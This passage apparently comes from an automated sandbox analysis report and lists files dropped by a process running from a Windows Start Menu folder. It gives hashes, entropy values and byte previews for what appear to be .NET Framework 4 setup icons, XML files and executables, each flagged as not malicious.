                                                            Preview:..............h.......(....... .................................................................................................... ............................................$.$ ..0./...........................{.{............ ...........<.;..........................................C.BA.@O.N...............{.{...~.~..................G.F..................................................................................................._.]..........................................n.lg.en.l..........................................p.n...............................................................................................................................................................................................................................................................................................................G.......................................G..........

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\Rotate7.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.4948009720290445
                                                            Encrypted:false
                                                            SSDEEP:6:kRKIekllisUriJ2IP+eX8iDml8mS8+hlxllwqlllkg2klHYdpqnHp/p5c:p8os0iieX8iNVHX//x2sHYdoHRp5c
                                                            MD5:FB4DFEBE83F554FAF1A5CEC033A804D9
                                                            SHA1:6C9E509A5D1D1B8D495BBC8F57387E1E7E193333
                                                            SHA-256:4F46A9896DE23A92D2B5F963BCFB3237C3E85DA05B8F7660641B3D1D5AFAAE6F
                                                            SHA-512:3CAEB21177685B9054B64DEC997371C4193458FF8607BCE67E4FBE72C4AF0E6808D344DD0D59D3D0F5CE00E4C2B8A4FFCA0F7D9352B0014B9259D76D7F03D404
                                                            Malicious:false
                                                            Preview:..............h.......(....... ....................................................................................................G.F..........................................H.GG.FX.V..............................).(.........G.F.........i.g..................+.*%.$5.4...............n.ln.l{.y.................. .......................u.s............................................................................................................................................................~.~...~.~.................................................................................................................................................................................................................................................................................................................................................G.......................................G..........

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\Rotate8.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.513882730304912
                                                            Encrypted:false
                                                            SSDEEP:12:pPv1OuTerb53mpOBfXjQuZfKWpIXE1D6HRp5c:91OEerb53eUQsflpIP4
                                                            MD5:D1C53003264DCE4EFFAF462C807E2D96
                                                            SHA1:92562AD5876A5D0CB35E2D6736B635CB5F5A91D9
                                                            SHA-256:5FB03593071A99C7B3803FE8424520B8B548B031D02F2A86E8F5412AC519723C
                                                            SHA-512:C34F8C05A50DC0DE644D1F9D97696CDB0A1961C7C7E412EB3DF2FD57BBD34199CF802962CA6A4B5445A317D9C7875E86E8E62F6C1DF8CC3415AFC0BD26E285BD
                                                            Malicious:false
                                                            Preview:..............h.......(....... ....................................................................................................g.e..........................................g.eg.ew.u..............................F.E.........g.e..............................E.DA.@P.O..........................................:.9......................................................................................&.%.........................................+.* ..+.*..................................................................................................................................................{.{.......................................................................................~.~...{.{..............................................................................................................................................G.......................................G..........

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\Save.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):1150
                                                            Entropy (8bit):4.824239610266714
                                                            Encrypted:false
                                                            SSDEEP:24:Br5ckw0Pce/WPv42lPpJ2/BatY9Y4ollEKeKzn:h6kPccWPQS2UtEYFEKeu
                                                            MD5:7D62E82D960A938C98DA02B1D5201BD5
                                                            SHA1:194E96B0440BF8631887E5E9D3CC485F8E90FBF5
                                                            SHA-256:AE041C8764F56FD89277B34982145D16FC59A4754D261C861B19371C3271C6E5
                                                            SHA-512:AB06B2605F0C1F6B71EF69563C0C977D06C6EA84D58EF7F2BAECBA566D6037D1458C2B58E6BFD70DDEF47DCCBDEA6D9C2F2E46DEA67EA9E92457F754D7042F67
                                                            Malicious:false
                                                            Preview:............ .h.......(....... ..... .....@........................................................................................klT.de..UV..RS..OP..MM..JJ..GG..DD..AA.x;<.x;<.r99.n67..........kl......D$.G2!...............VMH..>3..=6..91.r99..........op.........q[K.G<4..xh...........s..A5..B<..=5.x;<..........uv...........q[K.....G<4..........tg..KC..ID..B<.}>>..........{|.............q[K.q[K.q[K.q[K.vbR.}j[..VT..OL..ID..AA...............................yz..qr..kl..]\..VT..PL..DD.....................c`..^V..XK..R?..M4..G(..A...;...]\..VT..GG................fg.................................;...]\..JJ................mn..................................A...gg..MM................vw..................................G(..qr..OP..................................................M4..yz..RS..................................................R?.g33..UV....................................................XK..XY..XY..................................

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\Setup.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 12 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):36710
                                                            Entropy (8bit):5.3785085024370805
                                                            Encrypted:false
                                                            SSDEEP:384:IXcWz9GU46B4riEzg8CKcqxkk63gBh6wSphnBcI/ObMFp2rOebgcjTQcho:IMWQ2Bf8qqxMQP8pc4XessTJo
                                                            MD5:3D25D679E0FF0B8C94273DCD8B07049D
                                                            SHA1:A517FC5E96BC68A02A44093673EE7E076AD57308
                                                            SHA-256:288E9AD8F0201E45BC187839F15ACA79D6B9F76A7D3C9274C80F5D4A4C219C0F
                                                            SHA-512:3BDE668004CA7E28390862D0AE9903C756C16255BDBB3F7E73A5B093CE6A57A3165D6797B0A643B254493149231ACA7F7F03E0AF15A0CBE28AFF02F0071EC255
                                                            Malicious:false
                                                            Preview:..............(...............h...............h...V... .............. .............. ..........N...00......h...."..00..........^)..00...........8........ .h....T.. .... ......Y..00.... ..%...i..(....... ....................................................................................................w......x......................x..ww...........h...............................w.....w.x..........x................xwvwg.................................................................(....... ...................................jO:.mS?.qWD.v\I.|cP..kX..q_..sa..yg..{j...p..nh..pj..uo..|u..xq..|r..|u..rx..zy..|w.}.y...q...d...y...{......S...]..d..i..r..|...j..j...y...e...k...l..q...y...~...v...y..s..s..m...m...l...n...k...t...l..........................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\SysReqMet.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):1150
                                                            Entropy (8bit):5.038533294442847
                                                            Encrypted:false
                                                            SSDEEP:24:MuoBP5lj49s9NRDe4LakKcTM8cv99uGzMN:MlFH3/Ri4LaN3q
                                                            MD5:661CBD315E9B23BA1CA19EDAB978F478
                                                            SHA1:605685C25D486C89F872296583E1DC2F20465A2B
                                                            SHA-256:8BFC77C6D0F27F3D0625A884E0714698ACC0094A92ADCB6DE46990735AE8F14D
                                                            SHA-512:802CC019F07FD3B78FCEFDC8404B3BEB5D17BFC31BDED90D42325A138762CC9F9EBFD1B170EC4BBCCCF9B99773BD6C8916F2C799C54B22FF6D5EDD9F388A67C6
                                                            Malicious:false
                                                            Preview:............ .h.......(....... ..... .....@..........................................M...........S...........................................q.......................z...................................;........q.c.P.K.|.}............C....................................;.!......................................................Ry,.*w..!.............-.........................................6b..8v................ .+.@............#....................4u..;a..............H.<.........=.C.............................&y..x.e.................$}......................................<.).........\.A............}..................................[.R.}.n.Z.C.y.Y.k.L............. q..............................t.s............r...k.........]{G..............................................y.`.z.h.a.N.e.P...............................................~.q._.J...............................8....................t.p..................?..................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\SysReqNotMet.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):1150
                                                            Entropy (8bit):5.854644771288791
                                                            Encrypted:false
                                                            SSDEEP:24:u2iVNINssNQhYMEyfCHWZZ7rTRrbWjcyuE:uDW871fdZ1lbWjME
                                                            MD5:EE2C05CC9D14C29F586D40EB90C610A9
                                                            SHA1:E571D82E81BD61B8FE4C9ECD08869A07918AC00B
                                                            SHA-256:3C9C71950857DDB82BAAB83ED70C496DEE8F20F3BC3216583DC1DDDA68AEFC73
                                                            SHA-512:0F38FE9C97F2518186D5147D2C4A786B352FCECA234410A94CC9D120974FC4BE873E39956E10374DA6E8E546AEA5689E7FA0BEED025687547C430E6CEFFABFFB
                                                            Malicious:false
                                                            Preview:............ .h.......(....... ..... .....@....................................../..F..........!....n....d..................................;.............,+..AB..UV..XZ...1.....S......................U.....................EE..\[..rr......NP.....^..............<s.....................!.$)..AC..jj..ww..{{..57.....4........01.................H..........N?8;..[[..ba..`_..TU....L.......bj]^..QP.........:..........)N#&..>=..GG..HI..IJ..EE..!#......24..mm..hh..,.............+N........)(..*-.....{-...-,........ SPS..zy..qr....qq......0NCE..33..%%........ZJ...."$..0/../1....?qRU............W}..)A]^..rr..qq..Y[...._z........CE..RQ..AC....8`79.........SU..ab......||..ef....ey...........QZ[..ZZ..=?.....(...d....................pr.....H............IK..jj..fg..*,..........]_..................[y.......(..:VQS..{z..ut..ab....'H...........?................||..ef..jk..................$%d....................W....................................*,n.............................HI......................WY

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\stop.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):10134
                                                            Entropy (8bit):6.016582854640062
                                                            Encrypted:false
                                                            SSDEEP:96:uC1kqWje1S/f1AXa0w+2ZM4xD02EuZkULqcA0zjrpthQ2Ngms9+LmODclhpjdfLt:JkqAFqroMS9lD9Ngr9+m7bxpXHT5ToYR
                                                            MD5:5DFA8D3ABCF4962D9EC41CFC7C0F75E3
                                                            SHA1:4196B0878C6C66B6FA260AB765A0E79F7AEC0D24
                                                            SHA-256:B499E1B21091B539D4906E45B6FDF490D5445256B72871AECE2F5B2562C11793
                                                            SHA-512:69A13D4348384F134BA93C9A846C6760B342E3A7A2E9DF9C7062088105AC0B77B8A524F179EFB1724C0CE168E01BA8BB46F2D6FAE39CABE32CAB9A34FC293E4A
                                                            Malicious:false
                                                            Preview:...... ..........f...........(...N... ..........v...........h....... .... ............... .h....#..(... ...@......................................................................................................wwx...........w....w.........x....x.........x.y.......................p..............x.........q.......p.........q.................xy...........q.......................p.............y..................x.y..............y.y.............yyy.........S........x..........yy.............x.yyyx......................Q.8.........x..............y....qy.p...y.....x.....p........y....9.....y....yy..yx.......y..yyyw..p.....y.yyyyy................x.p........y.yy..........x...x............x.................wwx.....................?...................................................................................................?............(....... ..................................................................................................ww.....w..........xx..x........x....p........xy

                                                            C:\6c8944922f7b98d0b6cd82b768\Graphics\warn.ico

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):10134
                                                            Entropy (8bit):4.3821301214809045
                                                            Encrypted:false
                                                            SSDEEP:192:USAk9ODMuYKFfmiMyT4dvsZQl+g8DnPUmXtDV3EgTtc:r9wM7pyEBlcgssmXpVUgJc
                                                            MD5:B2B1D79591FCA103959806A4BF27D036
                                                            SHA1:481FD13A0B58299C41B3E705CB085C533038CAF5
                                                            SHA-256:FE4D06C318701BF0842D4B87D1BAD284C553BAF7A40987A7451338099D840A11
                                                            SHA-512:5FE232415A39E0055ABB5250B120CCDCD565AB102AA602A3083D4A4705AC6775D45E1EF0C2B787B3252232E9D4673FC3A77AAB19EC79A3FF8B13C4D7094530D2
                                                            Malicious:false
                                                            Preview:...... ..........f...........(...N... ..........v...........h....... .... ............... .h....#..(... ...@................................................................................................................................................................wwwww.....wwww...................3333333333338...{....3s.....x...{....0G;.............0.;...7.........33....8.....{...33..............0....7...............8.......{....;.............0.;.............0...8...........4...............wu;.............ww;.............ww;?...........;ww;.............7w................................8.............{...................................................................................................................................................................?...?..................................................?...?.........(....... ........................................................................................................333333;...............8.........;........

                                                            C:\6c8944922f7b98d0b6cd82b768\ParameterInfo.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (413), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):272046
                                                            Entropy (8bit):3.4004643852090877
                                                            Encrypted:false
                                                            SSDEEP:384:EYSROAGiYNVrkT+8TodTBltw11VTvcL1wCiUj78leRqmH9Hej2iXWKYP4JUaGMLi:EFROYoVQTLTQTDFdhaaot6PcbrIl
                                                            MD5:7213DA83E0F0B8AE4FEA44AE1CB7F62B
                                                            SHA1:F2E3FCC77A1AD4D042253BD2E0010BCB40B68ED3
                                                            SHA-256:59E67E4FB46E5490EEE63D8B725324F1372720ADE7345C74C6138C4A76EA73D9
                                                            SHA-512:86186AB0F2CB38E520DD1284042ECED157F96874846EB9061BE9CF56B84A1CAB5901A4879E105A8B04B336BBC43B03F4BDF198D43AF868BE188602347DB829E0
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .S.e.t.u.p.V.e.r.s.i.o.n.=.".1...0.".>..... . .<.U.I. .D.l.l.=.".S.e.t.u.p.U.i...d.l.l.". .N.a.m.e.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. .4. .S.e.t.u.p.". .V.e.r.s.i.o.n.=.".4...0...3.0.3.1.9.". ./.>..... . .<.C.o.n.f.i.g.u.r.a.t.i.o.n.>..... . . . .<.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . . . .<.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h. .N.a.m.e.=.".c.r.e.a.t.e.l.a.y.o.u.t.". ./.>..... . . . .<./.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . .<.U.s.e.r.E.x.p.e.r.i.e.n.c.e.D.a.t.a.C.o.l.l.e.c.t.i.o.n. .P.o.l.i.c.y.=.".O.S.C.o.n.t.r.o.l.l.e.d.". ./.>..... . . . .<.B.l.o.c.k.i.n.g.M.u.t.e.x. .N.a.m.e.=.".N.e.

                                                            C:\6c8944922f7b98d0b6cd82b768\Setup.exe

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):78152
                                                            Entropy (8bit):6.011592088917562
                                                            Encrypted:false
                                                            SSDEEP:1536:sYNItbBL5NWiiESc0exWZnqxMQP8ZOs0JD9rHUq:sYNAB9NWTZctc/gBJ9oq
                                                            MD5:006F8A615020A4A17F5E63801485DF46
                                                            SHA1:78C82A80EBF9C8BF0C996DD8BC26087679F77FEA
                                                            SHA-256:D273460AA4D42F0B5764383E2AB852AB9AF6FECB3ED866F1783869F2F155D8BE
                                                            SHA-512:C603ED6F3611EB7049A43A190ED223445A9F7BD5651100A825917198B50C70011E950FA968D3019439AFA0A416752517B1C181EE9445E02DA3904F4E4B73CE76
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.................j.}.....].v.....h.w.....\.H...v.e.|.......B.....h.~.....Y.|.....].~.....m.~.....l.~.....k.~...Rich............PE..L......K.........."......f...........+............@..........................P............@...... ..................pu..x...Tp..<.......................H....@...... ................................(..@............................................text....e.......f.................. ..`.data................j..............@....rsrc................v..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\SetupEngine.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):807256
                                                            Entropy (8bit):6.357664904941565
                                                            Encrypted:false
                                                            SSDEEP:24576:GS62nlYAqK/AitUgiuVQk/oifPNJIkjbSTzR8NmsBJj:GS62nlYAltBjPNJIkHST18QsBJ
                                                            MD5:84C1DAF5F30FF99895ECAB3A55354BCF
                                                            SHA1:7E25BA36BCC7DEED89F3C9568016DDB3156C9C5A
                                                            SHA-256:7A0D281FA802D615EA1207BD2E9EBB98F3B74F9833BBA3CB964BA7C7E0FB67FD
                                                            SHA-512:E4FB7E4D39F094463FDCDC4895AB2EA500EB51A32B6909CEC80A526BBF34D5C0EB98F47EE256C0F0865BF3169374937F047BF5C4D6762779C8CA3332B4103BE3
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................&......&.......R.....z.....O.....{......B...........O.....~.....J.....K.....L....Rich...........................PE..L......K.........."!................Y...............................................;.....@.....................................h....................:..X...............................................@............................................text............................... ..`.data...8...........................@....rsrc................f..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\SetupUi.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):295248
                                                            Entropy (8bit):6.262127887617593
                                                            Encrypted:false
                                                            SSDEEP:3072:/LTVUK59JN+C0iy4Ww8oBcPFIOrvHvr8QDZHAAKWiIHT6llN1QkvQZaiionv5y/y:HOoMFrz8ygAKWiiIyKf73w
                                                            MD5:EB881E3DDDC84B20BD92ABCEC444455F
                                                            SHA1:E2C32B1C86D4F70E39DE65E9EBC4F361B24FF4A1
                                                            SHA-256:11565D97287C01D22AD2E46C78D8A822FA3E6524561D4C02DFC87E8D346C44E7
                                                            SHA-512:5750CEC73B36A3F19BFB055F880F3B6498A7AE589017333F6272D26F1C72C6F475A3308826268A098372BBB096B43FBD1E06E93EECC0A81046668228BC179A75
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............I...I...I..bI...I..WI...I..cI..I..ZI...I...IG..I..WI...I..fI...I..RI...I..SI...I..TI...IRich...I................PE..L......K.........."!................................................................yq....@..........................................P...............j..P....`..0?..................................`z..@............................................text............................... ..`.data....Q.......4..................@....rsrc........P......................@..@.reloc...T...`...V..................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\SetupUi.xsd

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, ASCII text, with very long lines (335), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):30120
                                                            Entropy (8bit):4.990211039591874
                                                            Encrypted:false
                                                            SSDEEP:768:hlzLm8eYhsPs05F8/ET/chT+cxcW8G2P4oeTMC:1wchT+cxcDm
                                                            MD5:2FADD9E618EFF8175F2A6E8B95C0CACC
                                                            SHA1:9AB1710A217D15B192188B19467932D947B0A4F8
                                                            SHA-256:222211E8F512EDF97D78BC93E1F271C922D5E91FA899E092B4A096776A704093
                                                            SHA-512:A3A934A8572FF9208D38CF381649BD83DE227C44B735489FD2A9DC5A636EAD9BB62459C9460EE53F61F0587A494877CD3A3C2611997BE563F3137F8236FFC4CA
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema".. xmlns="http://schemas.microsoft.com/SetupUI/2008/01/imui".. xmlns:imui="http://schemas.microsoft.com/SetupUI/2008/01/imui".. targetNamespace="http://schemas.microsoft.com/SetupUI/2008/01/imui".. elementFormDefault="qualified"..attributeFormDefault="unqualified"..>.... <xs:annotation>.. <xs:documentation>.. Copyright (c) Microsoft Corporation. All rights reserved... Schema for describing DevDiv "Setup UI Info".. </xs:documentation>.. </xs:annotation>.... <xs:element name="SetupUI">.. <xs:annotation>.. <xs:documentation>specifies UI dll, and lists of MSIs MSPs and EXEs</xs:documentation>.. </xs:annotation>.. <xs:complexType>.. <xs:sequence>.. <xs:choice>.. <xs:element ref="UI" minOccurs="1" maxOccurs="1"></xs:element>.. <xs:element ref="Strings" minOccurs="1" maxOccurs="1"></xs:element>..

                                                            C:\6c8944922f7b98d0b6cd82b768\SetupUtility.exe

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):96088
                                                            Entropy (8bit):6.292361456158864
                                                            Encrypted:false
                                                            SSDEEP:1536:L+59IKI1N74oszIepIJqwlAno0dwRXPuY6zcVcE7OgkT9vs6M4raUZrH9rHUA:L+59hI1NktIemJllRXGYRKEaVM4raUZh
                                                            MD5:8DFBB95989AF28058C7431704CE7CD66
                                                            SHA1:78A5927D6B65D177F537FC671ED6BE4A77F20353
                                                            SHA-256:589B4F04ED38A35D29C4A16FCCB489C3FBA6505F5DA399C1A2AF0CA966486059
                                                            SHA-512:51FFB1B20006BB1C2F396C84EF19D7D47AD421D0A3196919B4ABC26405326BF15DDB989EDF815CBEDEEA8DEDC0454C0CC22A3987492E9BC1646A42A31151E1AF
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ux`.1...1...1...8a..0...^o......^o..!...^o..@...8a..:...1...T...Vo..0...Vo..;...Vo..0...Vo..0...Vo..0...Vo..0...Rich1...........................PE..L......K.........."......0...L.......^.......@....@..................................u....@...... ..................`>.......5..x....p...............`..X............................................K..@...............|............................text............0.................. ..`.data........@.......4..............@....rsrc........p.......D..............@..@.reloc..f............H..............@..B................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\SplashScreen.bmp

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PC bitmap, Windows 3.x format, 200 x 200 x 8, image size 40002, resolution 3779 x 3779 px/m, cbSize 41080, bits offset 1078
                                                            Category:dropped
                                                            Size (bytes):41080
                                                            Entropy (8bit):6.9955557349183595
                                                            Encrypted:false
                                                            SSDEEP:384:G1o2kgxmJGEsU3pP28+Qq1ms68/tUqHUlHGwM7bwv3ETbFrS:kkpoapTbimsqHGI
                                                            MD5:0966FCD5A4AB0DDF71F46C01EFF3CDD5
                                                            SHA1:8F4554F079EDAD23BCD1096E6501A61CF1F8EC34
                                                            SHA-256:31C13ECFC0EB27F34036FB65CC0E735CD444EEC75376EEA2642F926AC162DCB3
                                                            SHA-512:A9E70A2FB5A9899ACF086474D71D0E180E2234C40E68BCADB9BF4FE145774680CB55584B39FE53CC75DE445C6BF5741FC9B15B18385CBBE20FC595FE0FF86FCE
                                                            Malicious:false
                                                            Preview:BMx.......6...(...................B.......................{7...>...h?..D...N...K..........xE..._#..q..T...X...Q...[..._...c...j....>.!....f...v...r...."..v....0....... ..........4..I.........[...}..............j.............................................................................................................i......................@>1.......................................................o...u...u...z...z...~............................................................................................................................................................................{...~.................................................................................................................yw`......................................................................................................................................................//'...........................................

                                                            C:\6c8944922f7b98d0b6cd82b768\Strings.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):14084
                                                            Entropy (8bit):3.701412990655975
                                                            Encrypted:false
                                                            SSDEEP:384:VqZo71GHY3vqaqMnYfHHVXIHjfBHwnwXCa+F:VqB
                                                            MD5:8A28B474F4849BEE7354BA4C74087CEA
                                                            SHA1:C17514DFC33DD14F57FF8660EB7B75AF9B2B37B0
                                                            SHA-256:2A7A44FB25476886617A1EC294A20A37552FD0824907F5284FADE3E496ED609B
                                                            SHA-512:A7927700D8050623BC5C761B215A97534C2C260FCAB68469B7A61C85E2DFF22ED9CF57E7CB5A6C8886422ABE7AC89B5C71E569741DB74DAA2DCB4152F14C2369
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". ..... . . . . . . . . .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.S.t.r.i.n.g.s.>..... . . . .<.!.-.-. .R.e.f.l.e.c.t.i.v.e. .p.r.o.p.e.r.t.y. .p.a.g.e. .-.-.>..... . . . .<.I.D.S._.I.S._.R.E.A.L.L.Y._.C.A.N.C.E.L.>.#.(.l.o.c...i.d.s._.i.s._.r.e.a.l.l.y._.c.a.n.c.e.l.).<./.I.D.S._.I.S._.R.E.A.L.L.Y._.C.A.N.C.E.L.>......... . . . .<.!.-.-. .S.y.s.t.e.m. .R.e.q.u.i.r.e.m.e.n.t.s. .p.a.g.e. .-.-.>..... . . . .<.S.Y.S.R.E.Q.P.A.G.E._.R.E.Q.U.I.R.E.D._.A.N.D._.A.V.A.I.L.A.B.L.E._.D.I.S.K._.S.P.A.C.E.>.#.(.l.o.c...s.y.s.r.e.q.p.a.g.e._.r.e.q.u.i.r.e.d._.a.n.d._.a.v.a.i.l.a.b.l.e._.d.i.s.k._.s.p.a.c.e.).<./.S.Y.S.R.E.Q.P.A.G.E._.R.E.Q.U.I.R.E.D._.A.N.D._.A.V.A.I.L.A.B.L.E._.D.I.S.K._.S.

                                                            C:\6c8944922f7b98d0b6cd82b768\UiInfo.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):38898
                                                            Entropy (8bit):3.1042370213993578
                                                            Encrypted:false
                                                            SSDEEP:768:24UR0d5vssgP7ZgZ/vSguJQvFQXvDINJh6Fmhvk71sO0Nep3UL9Eu+dOtOcOdOjY:24UR0d5vsTPuZXQYQLIN/6Fmhvk71sOR
                                                            MD5:8B8B0A935DC591799A0C6D52FDC33460
                                                            SHA1:CE2748BD469AAD6E90B06D98531084D00611FB89
                                                            SHA-256:57A9CCB84CAE42E0D8D1A29CFE170AC3F27BDCAE829D979CDDFD5E757519B159
                                                            SHA-512:93009B3045939B65A0C1D25E30A07A772BD73DDA518529462F9CE1227A311A4D6FD7595F10B4255CC0B352E09C02026E89300A641492F14DF908AD256A3C9D76
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.U.I.>......... . . . .<.R.e.s.o.u.r.c.e.D.l.l.>.S.e.t.u.p.R.e.s.o.u.r.c.e.s...d.l.l.<./.R.e.s.o.u.r.c.e.D.l.l.>..... . . . .<.!.-.-..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.H.i.d.e./.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . .-.-.>..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.F.i.l.e.N.a.m.e.>.S.p.l.a.s.h.S.c.r.e.e.n...b.m.p.<./.F.i.l.e.N.a.m.e.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>......... . . . .<.L.C.I.D.H.i.n.t.s.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . . . . .<.R.e.g.K.e.y.>.H.K.C.U.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.9...0.\.G.e.n.e.r.a.l.<./.

                                                            C:\6c8944922f7b98d0b6cd82b768\header.bmp

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
